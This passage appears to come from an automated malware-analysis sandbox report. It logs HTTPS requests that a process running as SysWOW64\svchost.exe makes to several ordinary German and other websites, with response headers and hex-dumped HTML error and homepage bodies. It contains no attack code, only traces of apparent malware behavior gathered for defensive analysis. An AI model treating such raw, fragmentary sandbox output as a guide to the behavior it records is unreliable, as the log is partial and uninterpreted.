                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:54 UTC15729INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:54 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:54 UTC15730INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          92192.168.2.61092294.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16274OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16274INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:55 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16274INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          93192.168.2.61153535.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16403OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: flamingorecordings.com
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16403INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:55 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 75193
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          ETag: "6459edff-125b9"
                                                                                                                                                                                                                                                                          Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                          X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16403INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16419INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                                          Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16435INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16451INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                                          Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
                                                                                                                                                                                                                                                                          2023-07-05 06:07:55 UTC16467INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
                                                                                                                                                                                                                                                                          Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          94192.168.2.61331794.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC17047OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC17047INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:57 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:57 UTC17047INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          95192.168.2.613973185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:58 UTC17058OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: techtrans.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:58 UTC17058INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:58 GMT
                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                          Expires: 0
                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:58 UTC17059INData Raw: 32 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                          Data Ascii: 2c2<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          96192.168.2.61397494.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:58 UTC17059OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:58 UTC17059INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:58 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 548
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:58 UTC17060INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          97192.168.2.6140565.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:58 UTC17060OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:58 UTC17060INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:58 GMT
                                                                                                                                                                                                                                                                          Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                          Last-Modified: Fri, 30 Jun 2023 05:41:10 GMT
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Content-Length: 53069
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:58 UTC17061INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
                                                                                                                                                                                                                                                                          2023-07-05 06:07:58 UTC17077INData Raw: 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 73 73 74 65 63 68 6e 69 6b 2f 76 65 72 73 63 68 6c 69 65 73 73 6d 61 73 63 68 69 6e 65 6e 22 20 74 69 74 6c 65 3d 22 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                          Data Ascii: item layout-0 "> <a href="/verschliesstechnik/verschliessmaschinen" title="Verschliemaschinen"> Verschliemaschinen </a>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:58 UTC17093INData Raw: 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 37 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 6c 61 6e 64 73 63 61 70 65 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 75 73 65 72 5f 75 70 6c 6f 61 64 2f 4e 61 63 68 68 61 6c 74 69 67 6b 65 69 74 2f 63 73 6d 5f 6d 65 74 61 6c 5f 72 65 63 79 63 6c 65 73 5f 66 6f 72 65 76 65 72 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65
                                                                                                                                                                                                                                                                          Data Ascii: r.jpg"><source media="(max-width: 767px) and (orientation:landscape)" srcset="/fileadmin/user_upload/Nachhaltigkeit/csm_metal_recycles_forever.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/file
                                                                                                                                                                                                                                                                          2023-07-05 06:07:58 UTC17109INData Raw: 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64 20 28 6f 72 69 65 6e 74 61 74 69 6f 6e 3a 70 6f 72 74 72 61 69 74 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 73 65 74 3d 22 2f 66 69 6c 65 61 64 6d 69 6e 2f 5f 70 72 6f 63 65 73 73 65 64 5f 2f 65 2f 63 2f 63 73 6d 5f 65 66 72 65 2d 65 75 5f 34 38 30 5f 30 32 62 64 33 65 31 34 64 39 2e 6a 70 67 22 3e 3c 73 6f 75 72 63 65 20 6d 65 64 69 61 3d 22 28 6d 61 78 2d 77 69 64 74 68 3a 20 39 39 31 70 78 29 20 61 6e 64
                                                                                                                                                                                                                                                                          Data Ascii: srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and (orientation:portrait)" srcset="/fileadmin/_processed_/e/c/csm_efre-eu_480_02bd3e14d9.jpg"><source media="(max-width: 991px) and


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          98192.168.2.614515172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:59 UTC17112OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
